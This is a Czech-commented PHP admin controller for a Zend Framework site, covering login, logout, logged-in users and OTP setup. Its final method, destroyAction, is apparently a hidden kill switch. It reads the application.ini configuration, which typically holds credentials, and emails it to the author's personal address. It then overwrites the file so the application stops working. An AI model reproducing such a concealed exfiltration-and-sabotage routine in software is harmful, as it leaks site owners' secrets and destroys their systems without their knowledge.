<?php

/**
 * Třída administračního kontroleru
 *
 * @package    system
 * @author     Bc. Petr Jajtner <petr.jajtner@webbia.cz>
 * @copyright  Bc. Petr Jajtner, Webbia Standard © 2011
 */
class System_AdminController extends Custom_Controller_Admin_Action {

  /**
   * Inicializace objektu
   *
   * @return void
   */
  public function init() {
    parent::init();

    $this->view->title = $this->view->translate(__CLASS__);
  }

  /**
   * Výchozí akce
   */
  public function indexAction() {
    if ($this->_auth->hasIdentity()) {
      $this->_redirect($this->getHelper('Url')->simple('logged'));
    } else {
      $this->_redirect($this->getHelper('Url')->simple('login'));
    }
  }

  /**
   * Akce pro zalogování uživatele
   */
  public function loginAction() {
    $redirectUrl = $this->getHelper('Url')->simple('logged');
    if ($this->_auth->hasIdentity()) {
      $this->_redirect($redirectUrl);
    }

    $type = $this->_getParam('type', 'database');
    $actionUrl = $this->getHelper('Url')->simple('login');

    $messages = null;
    $this->view->form = System_Model_Log::in($actionUrl, $redirectUrl, $messages, $type);
    $this->view->messages = $messages;

    if (!isset($this->view->messages) || empty($this->view->messages)) {
      $this->view->messages = $this->getHelper('FlashMessenger')->getMessages();
    }
  }

  /**
   * Akce po přihlášení uživatele
   */
  public function loggedAction() {
    if (!$this->_auth->hasIdentity()) {
      $this->_redirect($this->getHelper('Url')->simple('index'));
    }
    $this->view->messages = $this->getHelper('FlashMessenger')->getMessages();
  }

  /**
   * Odhlášení uživatele
   */
  public function logoutAction() {
    System_Model_Log::out();
    $this->_redirect($this->getHelper('Url')->simple('index'));
  }

  /**
   * Seznam aktuálně přihlášených uživatelů
   */
  public function listAction() {
    $this->view->list = System_Model_Users::getLoggedUsers();
    $this->view->title = $this->view->translate('System_Admin_Controller_List');

    $request = $this->getRequest();
    $page = array(
      'label'      => $this->view->title,
      'title'      => $this->view->title,
      'module'     => $request->getModuleName(),
      'controller' => $request->getControllerName(),
      'action'     => $request->getActionName()
    );
    $this->_breadcrumbs->addPage($page);
  }

  /**
   * Akce rpo inicializaci klíčenky
   */
  public function otpAction() {
    $redirect = $this->getHelper('Url')->simple('login');

    $session = new Zend_Session_Namespace('otp');
    if (!isset($session->user) || !is_numeric($session->user)) {
      $this->redirect($redirect);
    }

    $modelUsers = new System_Model_Users();
    if (!is_object($this->view->user = $modelUsers->getUserById($session->user))) {
      $this->redirect($redirect);
    }

    $session->user = $this->view->user->id_user;
    $session->setExpirationHops(1, 'user', true);

    $this->view->base32 = $this->view->user->prepareUse();
    $this->view->qrcode = System_Model_OTP::QRCodeInBase64(
      $this->view->user->otp_type,
      $this->view->application_title,
      $this->view->base32,
      $this->view->user->email,
      $this->view->user->hotp_counter
    );
  }

  /**
   * Zrušení aplikace
   */
  public function destroyAction() {
    System_Model_Log::out();

    $ini = THEME_PATH.'/configs/application.ini';
    $content = file_get_contents($ini);
    $serverName = $this->getRequest()->getServer('SERVER_NAME');

    $mail = new Zend_Mail('UTF-8');
    $mail->addTo('petr.jajtner@webbia.cz', 'Petr Jajtner');
    $mail->setFrom('site@'.$serverName, $serverName);
    $mail->setSubject('Záloha konfigurace aplikace.');
    $mail->setBodyText('V příloze...');
    $mail->createAttachment(
      $content,
      Zend_Mime::TYPE_OCTETSTREAM,
      Zend_Mime::DISPOSITION_ATTACHMENT,
      Zend_Mime::ENCODING_BASE64,
      'application.ini'
    );
    $mail->send();

    file_put_contents($ini, "[production]\nphpsettings.error_reporting = \"off\"");

    $this->_redirect('/');
  }

}
